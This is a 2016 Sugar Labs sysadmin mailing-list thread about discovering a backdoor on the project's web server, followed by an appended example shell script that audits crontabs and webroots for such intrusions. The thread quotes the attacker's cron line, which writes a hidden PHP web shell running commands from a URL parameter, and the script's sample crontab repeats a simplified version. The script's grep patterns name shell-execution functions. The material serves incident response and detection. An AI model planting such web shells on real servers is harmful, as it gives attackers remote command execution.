[Systems] Found a backdoor
Walter Bender
walter.bender at gmail.com
Tue Mar 1 20:49:47 EST 2016
Let's shut it down for the time being. I've been updating the wiki but not
my blog since the attack last year anyway.
-walter
On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org> wrote:
> +walter
>
> Can we appoint an official maintainer for walterbender.org? Sorry for
> not stepping up myself, but I'm overwhelmed by work related things and
> trying to reduce my sysadmin load.
>
> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org> wrote:
> >
> > On 02/25/2016 04:09 AM, Sebastian Silva wrote:
> > > Remember in June we had an incident with a broken Wordpress site.
> > > I switched to static generator since then.
> > >
> > > +1 on containers just learning more about them and finding them fascinating.
> > > Count me in on containerizing everything.
> > >
> > > I'm not aware of other wordpress sites. Maybe walter's blog?
> > > Wordpress is a PIA IMHO.
> >
> > Yes, WP is riddled with security holes. Back in October, Samuel helped
> > Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
> > that the WP instance is now fully patched and locked down?
> >
> >
> > The WP version on the walterbender.org site is 4.3.1. The latest WP
> > version is 4.4.2. I have checked the WP change log and we can find this:
> >
> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
> > scripting vulnerability that could allow a site to be compromised.
> >
> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
> > security issues: a possible SSRF for certain local URIs, and an open
> > redirection attack.
> >
> > This site also uses the 2.5.9 akismet plugin. The latest version is 3.1.7.
> > Significant information on the release notes:
> >
> > * Pre-emptive security improvements to ensure that the Akismet plugin
> > can't be used by attackers to compromise a WordPress installation.
> > * Closes a potential XSS vulnerability.
> >
> > Of course, every version has a lot of bug fixes. We definitely should
> > upgrade it and test that nothing breaks on the walterbender.org site.
> >
> > Who is in charge of upgrading the other WP sites?
> >
> > Regards,
> >
> > Samuel C.
> >
> > > Regards,
> > > Sebastian
> > >
> > >
> > > On 25/02/16 04:47, Bernie Innocenti wrote:
> > >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
> > >> that www-data was executing commands like these:
> > >>
> > >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
> > >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> > >> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
> > >>
> > >> Did you spot the system()? This executes arbitrary commands specified
> > >> via the "localtime" URL parameter. Uh-oh.
> > >>
> > >> There were about a dozen lines like the above, installing .cache.php in
> > >> various virtualhosts. I kept a copy of the file in
> > >> /root/www-data.backdoor. The file was last written on Jun 23 2015,
> > >> which may correlate with the switch to the new website.
> > >>
> > >> I cleared the mess and searched the logs for requests containing
> > >> "localtime", but couldn't find any. I wonder if they could filter the
> > >> logs, since they were previously writable by www-data.
> > >>
> > >> Please watch out. We should ensure directories accessible over http are
> > >> not writable by user www-data, especially those in which PHP and CGIs
> > >> are enabled.
> > >>
> > >> Running several large sites under the same uid has always been a bad
> > >> security practice, and looking forward we should keep migrating them to
> > >> properly isolated containers.
> > >>
> > >> Finally, Wordpress is particularly dangerous and we should update and
> > >> harden all instances. Can someone please take care of this? I'll do
> > >> Mediawiki, which I know pretty well.
> > >>
> > >
> >
> >
> > --
> > _ // Bernie Innocenti
> > \X/ http://codewiz.org
> > _______________________________________________
> > Systems mailing list
> > Systems at lists.sugarlabs.org
> > http://lists.sugarlabs.org/listinfo/systems
> >
>
>
> --
> _ // Bernie Innocenti
> \X/ http://codewiz.org
>
--
Walter Bender
Sugar Labs
http://www.sugarlabs.org
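The checks Bernie describes in the thread (looking through the crontab spool for entries that drop PHP into a webroot, and making sure http-served directories are not writable by www-data), written up as an added example script that is not part of this thread or of any Sugar Labs tooling. It is POSIX sh. The /srv/www-example paths, the www-data uid and the sample crontab it demonstrates on are constructed assumptions; run it as root with a real webroot as the first argument to audit a host.

```shell
#!/bin/sh
# Added example, not code from the thread. Post-incident checks for the two
# findings above: cron entries dropping PHP into a webroot, and http-served
# directories writable by the web-server uid. Paths, the www-data uid and the
# sample crontab are assumptions/constructed for illustration.

# Print crontab lines (from stdin) that embed PHP tags, shell-execution
# functions, or redirect output into a webroot under /srv/www* or /var/www*.
suspicious_cron_lines() {
    grep -E -i -e '<\?php' \
               -e 'system\(|passthru\(|shell_exec\(|base64_decode' \
               -e '>[[:space:]]*/(srv|var)/www' || true
}

# Walk a crontab spool (default: the path Bernie inspected) and report each
# suspicious line prefixed with the crontab it came from.
scan_crontabs() {
    spool=${1:-/var/spool/cron/crontabs}
    for f in "$spool"/*; do
        [ -f "$f" ] || continue
        suspicious_cron_lines < "$f" | while IFS= read -r line; do
            printf '%s: %s\n' "$f" "$line"
        done
    done
}

# List directories under $1 that uid $2 (default www-data) could write to:
# world-writable, owner-writable and owned by it, or group-writable in its
# group. Clauses for a user/group that does not exist on this host are skipped.
writable_dirs() {
    webroot=$1; webuser=${2:-www-data}
    set -- -perm -002
    if id "$webuser" >/dev/null 2>&1; then
        set -- "$@" -o \( -user "$webuser" -perm -200 \)
    fi
    if getent group "$webuser" >/dev/null 2>&1; then
        set -- "$@" -o \( -group "$webuser" -perm -020 \)
    fi
    find "$webroot" -type d \( "$@" \)
}

# Hidden PHP files (the dropped file was named .cache.php) and any PHP file
# that calls system()/passthru()/shell_exec(); both deserve a manual look.
suspicious_php_files() {
    {
        find "$1" -type f -name '.*.php'
        find "$1" -type f -name '*.php' \
            -exec grep -l -E 'system\(|passthru\(|shell_exec\(' {} +
    } | sort -u
}

# Constructed crontab modelled on the www-data entries quoted above.
sample_crontab() {
    cat <<'EOF'
MAILTO=""
*/5 * * * * /usr/bin/php /srv/www-example/blog/wp-cron.php >/dev/null 2>&1
*/27 * * * * echo '<?php @system($_GET["localtime"]); ?>' > /srv/www-example/blog/.cache.php
0 3 * * * /usr/local/bin/rotate-logs.sh
EOF
}

# With a webroot argument, audit the live host (run as root); without one,
# demonstrate the cron check on the constructed sample.
if [ "$#" -ge 1 ]; then
    scan_crontabs
    writable_dirs "$1"
    suspicious_php_files "$1"
else
    sample_crontab | suspicious_cron_lines
fi
```

Anything writable_dirs reports is a directory the web server could drop a file into, which is exactly what Bernie asks to prevent; the usual fix is chown to root (or a deploy user) with mode 755, leaving only the directories the application must write to (uploads, cache) owned by www-data, and with PHP execution disabled there in the vhost config.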